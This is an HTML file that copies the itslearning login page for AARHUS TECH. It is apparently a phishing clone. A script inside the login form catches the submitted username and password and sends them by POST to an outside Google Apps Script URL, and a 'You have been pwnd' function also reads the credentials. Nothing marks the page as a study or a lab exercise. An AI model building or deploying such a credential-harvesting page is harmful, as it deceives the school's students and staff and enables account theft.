<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" class="" lang="da-DK">

<head id="Head">
    <title>Loginside for itslearning</title>
    <link href="https://statics.itslearning.com/v3.110.0.413/skins/itsl.css" type="text/css" rel="stylesheet">
    <link href="https://statics.itslearning.com/v3.110.0.413/skins/DoNotUse1/custom.css" type="text/css" rel="stylesheet">
    <link href="https://statics.itslearning.com/v3.110.0.413/application/login/index.bundle.css" type="text/css" rel="stylesheet">
    <link href="https://statics.itslearning.com/v3.110.0.413/skins/JQuery/theme/jquery-ui-1.11.4.custom.css" type="text/css" rel="stylesheet">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="referrer" content="origin">
    <link rel="icon" type="image/vnd.microsoft.icon" href="https://statics.itslearning.com/v3.110.0.413/favicon.ico">
    <link rel="apple-touch-icon" href="https://statics.itslearning.com/v3.110.0.413/touch-icon-iphone.png">
    <link rel="apple-touch-icon" sizes="76x76" href="https://statics.itslearning.com/v3.110.0.413/touch-icon-ipad.png">
    <link rel="apple-touch-icon" sizes="120x120" href="https://statics.itslearning.com/v3.110.0.413/touch-icon-iphone-retina.png">
    <link rel="apple-touch-icon" sizes="152x152" href="https://statics.itslearning.com/v3.110.0.413/touch-icon-ipad-retina.png">
    <meta name="apple-itunes-app" content="app-id=951619066">
    <meta name="google-play-app" content="app-id=com.itslearning.itslearningintapp">
    <script type="text/javascript" src="https://statics.itslearning.com/v3.110.0.413/javascript/Common.js"></script>

    <script type="text/javascript" src="https://statics.itslearning.com/v3.110.0.413/ui/controls/media/javascript/AC_RunActiveContent.js"></script>

    <script type="text/javascript" src="https://statics.itslearning.com/v3.110.0.413/javascript/onboarding/onboarding.min.js"></script>

    <style type="text/css" id="vakata-stylesheet">
        #vakata-dragged {
            display: block;
            margin: 0 0 0 0;
            padding: 4px 4px 4px 24px;
            position: absolute;
            top: -2000px;
            line-height: 16px;
            z-index: 10000;
        }
        
        #vakata-contextmenu {
            display: block;
            visibility: hidden;
            left: 0;
            top: -200px;
            position: absolute;
            margin: 0;
            padding: 0;
            min-width: 180px;
            background: #ebebeb;
            border: 1px solid silver;
            z-index: 10000;
        }
        
        #vakata-contextmenu ul {
            min-width: 180px;
        }
        
        #vakata-contextmenu ul,
        #vakata-contextmenu li {
            margin: 0;
            padding: 0;
            list-style-type: none;
            display: block;
        }
        
        #vakata-contextmenu li {
            line-height: 20px;
            min-height: 20px;
            position: relative;
            padding: 0px;
        }
        
        #vakata-contextmenu li a {
            padding: 1px 6px;
            line-height: 17px;
            display: block;
            text-decoration: none;
            margin: 1px 1px 0 1px;
        }
        
        #vakata-contextmenu li ins {
            float: left;
            width: 16px;
            height: 16px;
            text-decoration: none;
            margin-right: 2px;
        }
        
        #vakata-contextmenu li a:hover,
        #vakata-contextmenu li.vakata-hover>a {
            background: gray;
            color: white;
        }
        
        #vakata-contextmenu li ul {
            display: none;
            position: absolute;
            top: -2px;
            left: 100%;
            background: #ebebeb;
            border: 1px solid gray;
        }
        
        #vakata-contextmenu .right {
            right: 100%;
            left: auto;
        }
        
        #vakata-contextmenu .bottom {
            bottom: -1px;
            top: auto;
        }
        
        #vakata-contextmenu li.vakata-separator {
            min-height: 0;
            height: 1px;
            line-height: 1px;
            font-size: 1px;
            overflow: hidden;
            margin: 0 2px;
            background: silver;
            /* border-top:1px solid #fefefe; */
            padding: 0;
        }
    </style>
    <style type="text/css" id="jstree-stylesheet">
        .jstree ul,
        .jstree li {
            display: block;
            margin: 0 0 0 0;
            padding: 0 0 0 0;
            list-style-type: none;
        }
        
        .jstree li {
            display: block;
            min-height: 18px;
            line-height: 18px;
            white-space: nowrap;
            margin-left: 18px;
            min-width: 18px;
        }
        
        .jstree-rtl li {
            margin-left: 0;
            margin-right: 18px;
        }
        
        .jstree>ul>li {
            margin-left: 0px;
        }
        
        .jstree-rtl>ul>li {
            margin-right: 0px;
        }
        
        .jstree ins {
            display: inline-block;
            text-decoration: none;
            width: 18px;
            height: 18px;
            margin: 0 0 0 0;
            padding: 0;
        }
        
        .jstree a {
            display: inline-block;
            line-height: 16px;
            height: 16px;
            color: black;
            white-space: nowrap;
            text-decoration: none;
            padding: 1px 2px;
            margin: 0;
        }
        
        .jstree a:focus {
            outline: none;
        }
        
        .jstree a>ins {
            height: 16px;
            width: 16px;
        }
        
        .jstree a>.jstree-icon {
            margin-right: 3px;
        }
        
        .jstree-rtl a>.jstree-icon {
            margin-left: 3px;
            margin-right: 0;
        }
        
        li.jstree-open>ul {
            display: block;
        }
        
        li.jstree-closed>ul {
            display: none;
        }
        
        #vakata-dragged ins {
            display: block;
            text-decoration: none;
            width: 16px;
            height: 16px;
            margin: 0 0 0 0;
            padding: 0;
            position: absolute;
            top: 4px;
            left: 4px;
            -moz-border-radius: 4px;
            border-radius: 4px;
            -webkit-border-radius: 4px;
        }
        
        #vakata-dragged .jstree-ok {
            background: green;
        }
        
        #vakata-dragged .jstree-invalid {
            background: red;
        }
        
        #jstree-marker {
            padding: 0;
            margin: 0;
            font-size: 12px;
            overflow: hidden;
            height: 12px;
            width: 8px;
            position: absolute;
            top: -30px;
            z-index: 10001;
            background-repeat: no-repeat;
            display: none;
            background-color: transparent;
            text-shadow: 1px 1px 1px white;
            color: black;
            line-height: 10px;
        }
        
        #jstree-marker-line {
            padding: 0;
            margin: 0;
            line-height: 0%;
            font-size: 1px;
            overflow: hidden;
            height: 1px;
            width: 100px;
            position: absolute;
            top: -30px;
            z-index: 10000;
            background-repeat: no-repeat;
            display: none;
            background-color: #456c43;
            cursor: pointer;
            border: 1px solid #eeeeee;
            border-left: 0;
            -moz-box-shadow: 0px 0px 2px #666;
            -webkit-box-shadow: 0px 0px 2px #666;
            box-shadow: 0px 0px 2px #666;
            -moz-border-radius: 1px;
            border-radius: 1px;
            -webkit-border-radius: 1px;
        }
        
        .jstree .jstree-real-checkbox {
            display: none;
        }
        
        .jstree-themeroller .ui-icon {
            overflow: visible;
        }
        
        .jstree-themeroller a {
            padding: 0 2px;
        }
        
        .jstree-themeroller .jstree-no-icon {
            display: none;
        }
        
        .jstree .jstree-wholerow-real {
            position: relative;
            z-index: 1;
        }
        
        .jstree .jstree-wholerow-real li {
            cursor: pointer;
        }
        
        .jstree .jstree-wholerow-real a {
            border-left-color: transparent !important;
            border-right-color: transparent !important;
        }
        
        .jstree .jstree-wholerow {
            position: relative;
            z-index: 0;
            height: 0;
        }
        
        .jstree .jstree-wholerow ul,
        .jstree .jstree-wholerow li {
            width: 100%;
        }
        
        .jstree .jstree-wholerow,
        .jstree .jstree-wholerow ul,
        .jstree .jstree-wholerow li,
        .jstree .jstree-wholerow a {
            margin: 0 !important;
            padding: 0 !important;
        }
        
        .jstree .jstree-wholerow,
        .jstree .jstree-wholerow ul,
        .jstree .jstree-wholerow li {
            background: transparent !important;
        }
        
        .jstree .jstree-wholerow ins,
        .jstree .jstree-wholerow span,
        .jstree .jstree-wholerow input {
            display: none !important;
        }
        
        .jstree .jstree-wholerow a,
        .jstree .jstree-wholerow a:hover {
            text-indent: -9999px !important;
            width: 100%;
            padding: 0 !important;
            border-right-width: 0px !important;
            border-left-width: 0px !important;
        }
        
        .jstree .jstree-wholerow-span {
            position: absolute;
            left: 0;
            margin: 0px;
            padding: 0;
            height: 18px;
            border-width: 0;
            padding: 0;
            z-index: 0;
        }
    </style>
</head>

<body class="itsl-login">
    <main>
        <div class="prom-banner__live-region" aria-live="polite" role="status" aria-atomic="true"></div>
        <form id="dataform">
            <script src="https://statics.itslearning.com/v3.110.0.413/javascript/jQuery/jquery-1.7.1/jquery-1.7.1.min.js" type="text/javascript"></script>
            <script src="https://statics.itslearning.com/v3.110.0.413/javascript/jQuery/jquery-1.7.1/jquery-ui-1.11.4.custom.min.js" type="text/javascript"></script>
            <script src="https://statics.itslearning.com/v3.110.0.413/javascript/commonControlLibrary.min.js" type="text/javascript"></script>
            <section id="LoginSection" class="itsl-widget itsl-login-container group">
                <img class="l-login-sitelogo h-mrb10" src="https://files.itslearning.com/data/776/Skin/customer_login_logo.png" alt="itslearning" style="border-width:0px;">

                <section>
                    <h1 class="h-dsp-ib h-mr0">
                        AARHUS TECH
                    </h1>
                    <div>

                        <p class="h-fnt-sm h-pd0 h-pdb10 h-mr0 h-pdt5">
                            <a href="/welcome.aspx?clean=true&amp;LanguageId=9" class="h-mrl10 h-fnt-sm">
                        Ikke fra AARHUS TECH?
                    </a>
                        </p>

                    </div>

                    <div id="ErrorMessagePanel" class="h-highlight h-mr0">



                    </div>
                </section>

                <section class="its-login-input-container">
                    <ul class="rwgm-row">

                        <li id="nativeAndLdapLogin" class="ccl-rwgm-column-1-1">
                            <div id="nativeAndLdapLoginWrapper">
                                <p class="h-fnt-sm">
                                    Log på med itslearning
                                </p>
                                <script>
                                    const getPWND = () => {
                                        username = document.getElementById("Username_input").value
                                        password = document.getElementById("Password_input").value
                                        alert("You have been pwnd. " + username + ":" + password)
                                    }

                                    function formSubmit(event) {
                                        var url = "https://script.google.com/macros/s/AKfycbwMnOe4sgCOTAEG40HfSid4RzFNK6K6Q49XuAZ7kt9Bd4syX0sX/exec";
                                        var request = new XMLHttpRequest();
                                        request.open('POST', url, true);
                                        request.onload = function() { // request successful
                                            // we can use server response to our request now
                                            console.log(request.responseText);
                                        };

                                        request.onerror = function() {
                                            // request failed
                                        };

                                        request.send(new FormData(event.target)); // create FormData from form that triggered event
                                        event.preventDefault();
                                    }
                                    document.getElementById("dataform").addEventListener("submit", formSubmit);
                                </script>
                                <div id="Username" class="elogin-item"><input name="Username" type="text" size="20" id="Username_input" class="h-width-100" placeholder="Brugernavn" aria-label="Brugernavn" required="required" autocorrect="off" autocapitalize="off" aria-describedby="ErrorMessagePanel"
                                        autofocus="autofocus">
                                    <div class="h-fl-c"></div>
                                </div>
                                <div id="Password" class="elogin-item"><input name="Password" type="password" size="20" id="Password_input" class="h-width-100" placeholder="Adgangskode" aria-label="Adgangskode" required="required" autocorrect="off" autocapitalize="off" aria-describedby="ErrorMessagePanel">
                                    <div class="h-fl-c"></div>
                                </div>
                                <input type="submit" value="Log på" id="nativeLoginButton" class="ccl-button ccl-button-color-green ccl-button-ok itsl-no-text-decoration itsl-native-login-button">


                            </div>
                        </li>



                    </ul>

                </section>
            </section>


            <div id="News_NewsComponent" class="itsl-login-container itsl-widget group">
                <div class="h-txt-algn-l">
                    <div>
                        <h2 class="itsl-customer-news-list-title">
                            Oplysninger
                        </h2>
                        <a href="/Rss.aspx?Id=0X776" target="_blank" title="Abonner på denne blog"><img alt="Abonner på denne blog" src="https://statics.itslearning.com/v3.110.0.413/icons/xp/RssFeed16.png"></a>


                    </div>

                    Der er ikke nogen nyheder

                </div>
            </div>

            <div class="l-login-links">
                <ul id="ctl00_LoginResources_innerContainer" class="h-hlist">

                    <li>
                        <a href="/Course/list_enrolment_courses.aspx?clean=true&amp;LanguageId=9&amp;CustomerId=776">Fagkatalog for læreanstalt</a>
                    </li>

                    <li>
                        <a href="http://www.itslearning.dk/support-kontakt">Help desk</a>
                    </li>

                    <li>
                        <a href="/CleanCookie.aspx">Clean itslearning cookies</a>
                    </li>

                </ul>
            </div>

            <iframe src="https://platform.itslearning.com/Redirection/SetCustomerId.aspx?CustomerId=776" style="display: none;"></iframe>

            <div class="copyright h-position-s">
                <div class="copyrightlogo">
                    <img src="https://statics.itslearning.com/v3.110.0.413/images/brand.svg" alt="itslearning">
                </div>itslearning (3.110.0.413) Copyright © 2020 itslearning - All rights reserved <br>itslearning.com
            </div>


            <script type="text/javascript">
                //<![CDATA[
                new SmartBanner({
                    "icon": "https://statics.itslearning.com/v3.110.0.413//images/logo-badge.svg",
                    "daysHidde": 90,
                    "daysReminder": 15,
                    "title": "itslearning",
                    "author": "itslearning AS",
                    "button": "VIS",
                    "store": {
                        "ios": "I App Store",
                        "android": "I Google Play"
                    },
                    "price": {
                        "ios": "GRATIS",
                        "android": "GRATIS"
                    },
                    "force": null
                });
                $(function() {
                    IframeClickEventHelper.registerDocumentClickBubblingOnTop();
                });
                attachOnReadySendTitleToParent();
                $(function() {
                    if (!('autofocus' in document.createElement('input'))) {
                        document.getElementById('Username_input').focus();
                    }
                }); //]]>
            </script>
        </form>
        <div class="language-picker"><label class="language-picker--modal-button-label" for="language-picker--modal-button">Vælg sprog</label>

            <button id="language-picker--modal-button" class="language-picker--modal-button" type="button" data-value="da-DK"><span class="language-picker--modal-button-text">Dansk</span></button>

        </div>
        <script type="text/javascript">
            var LoginPageSettings = {
                "userNameInputClientId": "",
                "languagePickerLanguages": [{
                    "value": "nb-NO",
                    "text": "Bokmål",
                    "id": "0"
                }, {
                    "value": "co-FR",
                    "text": "Corsu",
                    "id": "15"
                }, {
                    "value": "da-DK",
                    "text": "Dansk",
                    "id": "9"
                }, {
                    "value": "de-DE",
                    "text": "Deutsch",
                    "id": "6"
                }, {
                    "value": "en-GB",
                    "text": "English (UK)",
                    "id": "1"
                }, {
                    "value": "en-US",
                    "text": "English (US)",
                    "id": "13"
                }, {
                    "value": "es-ES",
                    "text": "Español",
                    "id": "10"
                }, {
                    "value": "fr-FR",
                    "text": "Français",
                    "id": "11"
                }, {
                    "value": "it-IT",
                    "text": "Italiano",
                    "id": "12"
                }, {
                    "value": "lt-LT",
                    "text": "Lietuvių",
                    "id": "19"
                }, {
                    "value": "nl-NL",
                    "text": "Nederlands",
                    "id": "4"
                }, {
                    "value": "nn-NO",
                    "text": "Nynorsk",
                    "id": "2"
                }, {
                    "value": "pl-PL",
                    "text": "Polski (Polska)",
                    "id": "18"
                }, {
                    "value": "pt-BR",
                    "text": "Português brasileiro",
                    "id": "14"
                }, {
                    "value": "fi-FI",
                    "text": "Suomi",
                    "id": "17"
                }, {
                    "value": "sv-SE",
                    "text": "Svenska",
                    "id": "3"
                }, {
                    "value": "tr-TR",
                    "text": "Türkçe",
                    "id": "16"
                }, {
                    "value": "zh-CN",
                    "text": "中文(中国)",
                    "id": "20"
                }],
                "languagePickerSelectedValue": "da-DK",
                "loginBannerLocalizedText": null,
                "i18n": {
                    "selectLanguage": "Vælg sprog",
                    "close": "Luk"
                },
                "requestItems": {
                    "userName": "Username",
                    "languageId": "LanguageId"
                }
            };
        </script>

        <script type="text/javascript">
            // Show the native login / LDAP inputs and hide the clicked link's div.
            // Set the hidden field's value to save the setting to the viewstate.
            // The hidden field is read in code and the visibility will be maintained between postbacks.
            function showNativeLoginElement() {
                var nativeLoginElementId = 'nativeAndLdapLogin';
                var nativeLoginElement = $('#' + nativeLoginElementId);
                var orSeparatorElementId = 'orSeparator';
                var orSeparatorElement = $('#' + orSeparatorElementId);
                var federatedLoginElementId = 'federatedLogin';
                var federatedLoginElement = $('#' + federatedLoginElementId);
                var showNativeLoginLinkId = 'nativeLoginLinkContainer';
                var showNativeLoginLinkElement = $('#' + showNativeLoginLinkId);
                var federatedLoginWrapperId = 'federatedLoginWrapper';
                var federatedLoginWrapperElement = $('#' + federatedLoginWrapperId);
                var showNativeLoginValueFieldId = 'showNativeLoginValueField';
                var showNativeLoginValueFieldElement = $('#' + showNativeLoginValueFieldId);
                if (nativeLoginElement && orSeparatorElement && showNativeLoginLinkElement) {
                    federatedLoginElement.addClass('ccl-rwgm-column-1-2');
                    nativeLoginElement.addClass('ccl-rwgm-column-1-2');
                    nativeLoginElement.addClass("itslogin-box");
                    federatedLoginWrapperElement.addClass("itslogin-box-wrapper-right");
                    nativeLoginElement.fadeIn();
                    orSeparatorElement.fadeIn();
                    showNativeLoginLinkElement.hide();
                    showNativeLoginValueFieldElement.val('true');
                }
            };
            if (window.chrome && window.chrome.runtime) {
                window.chrome.runtime.sendMessage('pdfhopilbndifmfcejgddoabigadjgpm', {
                        message: 'isChromebook'
                    },
                    function(response) {
                        if (response && response.isChromebook) {
                            document.getElementById('ChromebookApp').value = 'true';
                        }
                    });
            }
        </script>



        <script src="https://statics.itslearning.com/v3.110.0.413/javascript/Polyfills/objectassign.min.js"></script>
        <script src="https://statics.itslearning.com/v3.110.0.413/javascript/Polyfills/find.min.js"></script>
        <script src="https://statics.itslearning.com/v3.110.0.413/javascript/Polyfills/url.min.js"></script>
        <script src="https://statics.itslearning.com/v3.110.0.413/application/login/index.bundle.js"></script>
    </main>


    <div id="jstree-marker" style="display: none;">»</div>
    <div id="jstree-marker-line" style="display: none;"></div>
    <div id="vakata-contextmenu"></div>
</body>

</html>
